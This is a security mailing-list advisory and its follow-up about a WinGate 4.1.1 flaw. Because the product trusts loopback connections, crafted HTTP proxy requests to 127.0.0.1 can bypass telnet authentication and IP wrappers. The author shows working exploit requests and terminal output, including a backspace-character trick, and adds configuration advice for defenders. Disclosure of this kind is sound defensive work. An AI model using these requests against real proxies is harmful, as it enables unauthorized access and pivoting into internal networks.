Wingate 4.1.1, new year 's bug: UPDATE

[gregory duchemin <c3rb3r () HOTMAIL COM>]

Hi,
I posted the mail below to bugtraq few days ago describing a somewhat weird
bug into wingate 4.1.1 (last release) that allow to bypass all
authentication/wrapper mechanism in the software.
Further tests later, i think to know why.
When you configure a proxy service in the properties window, u have to
choose, among others, your binding/Interfaces/Policy settings.
These three are very important for your safety.
The first determine which interface connections are allowed to come from.
Second, to wich one, they should be sent.
Third one determine your per user policy.
By default, bindings settings come with "Allow connections coming in on any
interface" checked wich include loopback 127.0.0.1.

THE FLAW IS HERE !!

When connecting to my telnet redirector (port 23 with only one user "admin"
allowed), i'm prompted for login/password but when connecting directly from
loopback (on the proxy host), no authentication at all !
Alles klar , if users can use the http proxy they can use loopback and
redirecor too to bypass authentication/IP wrapper for others services.
Like i described it in the previous post.
For example:
#telnet wingate_ip 80
GET http://127.0.0.1:23/

I changed my TELNET PROXY bindings settings with "Connections will be
accepted from the following interface only xxx.xxx.xxx.xxx" ( i mean
anything else than loopback ). I was unable to do a bounce attack anymore
even trying GET http://xxx.xxx.xxx.xxx:23

It seems to be a BUG in the security scheme used by wingate that trust that
anything coming from 127.0.0.1 is already authenticated.

If u look at "advanced options" in the Options menu, we will find that
default configuration trust any interface, u can't disable trusting of
127.0.0.1 (at least not with an eval version). May be disable this would
make the job.

My second advise in my post was
2/ Remove your services default binding to 127.0.0.1, when u don't use
a service at all, suppress all its instance.

Now i would say

2/ ALWAYS Remove your services default binding to 127.0.0.1 (Never use
loopback), just use the IP address your really need !.


Have a nice day,



===================================
Gregory Duchemin   -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com



=======
hi bugtraqers

wingate 4.1.1 is once again vulnerable cause ( once again !) of a too
permissive redirector engine (tested with version pro eval on NT server 4.0)

It's usual to say redirector services like telnet and ftp at least, should
be granted to only few people (authentication) and binded only on private
interface ( binding configuration ) while accepting connections from some
specific network/ip ( wrapping ).
Nevertheless, most of the time, http proxies, even binded only on a private
segment, are granted for all employees, for a public usage.

There is a way to abuse wingate services authentication/wrapper/binding
schemes simply by using the http proxy. Any user allowed to connect the
proxy should be able to use any of UP wingate services.

For instance, if u create an admin account, allowed to use your telnet and
ftp services, while discarding all other users, u'll be ask for
username/password authentication next time u connect to these ports (NT
scheme or wingate one depending what u choosed).
weather is clear.

Now, if u connect to the web proxy port and craft a special request for the
local telnet service while using ctrl-H chars, u will be able to bypass
twice policy (authentication) and IP wrapper (binding conf) leading in
remotely forcing wingate to open a telnet,ftp,whatever... connexion to any
other host, potentialy even from outside to inside the corporate network if
http proxy is reachable from outside (However, it was already a bad idea
before this bug).
If u don't use telnet, ftp, whatever services but have let them binded on
loopback ( default configuration ), u r vulnerable.

Take a look at that:

#telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]
Login:

Telnet redirector asks for a credential.
Till now, everything looks quiet.

And now....

#telnet 10.0.0.1 80
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]
GET http://127.0.0.1:23/H3ll
WinGate> GET /H3ll
Connecting to host GET.....Host name lookup 'GET' Failed
HTTP/1.0
Connecting to host....Socket error   blahblahblah........

Great ! we catch a wingate telnet prompt : WinGate >
Telnet even tried to connect to "GET /H3ll" !
May be we could forge a good request (a valid hostname/ip).
Let's try something with ^H (this old friend ;) )

#telnet 10.0.0.1 80
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escaped character is ^]

GET^H^H^H http://127.0.0.1:23/^H^H127.0.0.1   3 ^H for GET, 2 more for / and
' '

WInGate>127.0.0.1
Connecting to host 127.0.0.1...Connected
Connection terminated by remote host
Connection closed by foreign host

It's OK !...connection was established between telnet and pop3 services
It's possible to jump from service to service inside wingate bypassing every
authentication systems. Each connection is present in the logging window but
if u look more carrefully in the telnet session properties u will see that
we were telnet authenticated as administrator (the mere user allowed in the
conf)without any password and from 127.0.0.1 ;) really funny !

Conclusion:

1/ never grant access from outside your corporate network, specially http
proxy service. Allowing this would make all your private network vulnerable
from Internet, anybody would be able to pass through your proxy and thus
potentialy to reach office servers through other wingate services. Nothing
really new

2/ Remove your services default binding to 127.0.0.1, when u don't use
a service at all, suppress all its instance.

3/ never use telnet service, too weak, too dangerous.
Even with all the security rules above, users from inside your network may
be still able to use http proxy as a redirector toward any others
hosts/services.

4/ in the www proxy interface configuration, choose the right interface for
outbound connection to prevent any redirection, and so, any attack in your
network.

I did not see any configuration option to, at least, fix a port range inside
all http proxy requests. It would be a nice idea.
I suppose things are quiet similar by using ftp to reach http,pop,telnet,..
and so on.
Any thoughts ?

Have a nice day


===================================
Gregory Duchemin   -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com


_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.